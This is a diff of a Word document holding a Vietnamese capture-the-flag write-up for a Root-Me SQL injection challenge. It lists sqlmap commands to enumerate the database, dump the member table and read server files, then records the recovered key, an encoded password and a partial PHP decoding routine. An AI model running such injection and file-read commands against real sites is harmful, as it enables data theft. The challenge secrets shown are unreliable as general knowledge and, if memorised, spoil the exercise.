--- a/BT3456/5/59.docx
+++ b/BT3456/5/59.docx
@@ -2,6 +2,48 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA6E90B" wp14:editId="6FE02A47">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="554854660" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="554854660" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId6"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -20,6 +62,56 @@
     </w:sectPr>
   </w:body>
 </w:document>
+</file>
+
+<file path=word/endnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:endnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+  <w:endnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+  <w:endnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:endnote>
+</w:endnotes>
+</file>
+
+<file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+  <w:footnote w:type="separator" w:id="-1">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:separator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+  <w:footnote w:type="continuationSeparator" w:id="0">
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:continuationSeparator/>
+      </w:r>
+    </w:p>
+  </w:footnote>
+</w:footnotes>
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
@@ -450,6 +542,50 @@
     <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
+  <w:style w:type="paragraph" w:styleId="Header">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="HeaderChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="009C7AC2"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
+    <w:name w:val="Header Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Header"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="009C7AC2"/>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="Footer">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="Normal"/>
+    <w:link w:val="FooterChar"/>
+    <w:uiPriority w:val="99"/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="009C7AC2"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4680"/>
+        <w:tab w:val="right" w:pos="9360"/>
+      </w:tabs>
+      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+    </w:pPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
+    <w:uiPriority w:val="99"/>
+    <w:rsid w:val="009C7AC2"/>
+  </w:style>
 </w:styles>
 </file>
 

--- a/BT3456/5/59.docx
+++ b/BT3456/5/59.docx
@@ -1,17 +1,42 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Ta thấy trang không filter đầu </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>vào</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Đầu tiên ta sẽ thực hiện các lệnh thăm dò</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Thăm dò db</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>py sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --dbs</w:t>
+      </w:r>
+    </w:p>
     <w:p>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA6E90B" wp14:editId="6FE02A47">
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DD638C8" wp14:editId="1D6F4C29">
             <wp:extent cx="5943600" cy="3343275"/>
             <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="554854660" name="Picture 1"/>
+            <wp:docPr id="1988368378" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -19,7 +44,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="554854660" name=""/>
+                    <pic:cNvPr id="1988368378" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
@@ -45,13 +70,474 @@
       </w:r>
     </w:p>
     <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Thăm dò table </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sqlmap -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --tables -D c_webserveur_31</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59E50A91" wp14:editId="6F0A8BC8">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1755318538" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1755318538" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Thăm dò cột</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>py sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --columns -D c_webserveur_31 -T member</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB5BF25" wp14:editId="4B8F324E">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="552798613" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="552798613" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Thực hiện dump</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>py sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" --dump -D c_webserveur_31 -T member</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CCBC564" wp14:editId="4BDD293A">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="1087386099" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1087386099" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Mempass: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>VA5QA1cCVQgPXwEAXwZVVVsHBgtfUVBaV1QEAwIFVAJWAwBRC1tRVA==</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Tìm code và key</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>python sqlmap.py -u "http://challenge01.root-me.org/web-serveur/ch31/?action=members&amp;id=1" —-file-read=/challenge/web-serveur/ch31/index.php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5498EE0A" wp14:editId="7B7035F6">
+            <wp:extent cx="5943600" cy="3343275"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="239121426" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="239121426" name="Picture 1" descr="Text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3343275"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Key: </w:t>
+      </w:r>
+      <w:r>
+        <w:t>c92fcd618967933ac463feb85ba00d5a7ae52842</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Viết code php để giải password</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>&lt;?php</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+        <w:t xml:space="preserve">function </w:t>
+      </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
-        <w:t>T!m</w:t>
+        <w:t>stringxor(</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
-        <w:t>3B@s3DSQL!</w:t>
+        <w:t>$o1, $o2) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>$res = '</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>';</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>for($i=</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>0;$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>i&lt;strlen($o1);$i++)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>res .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
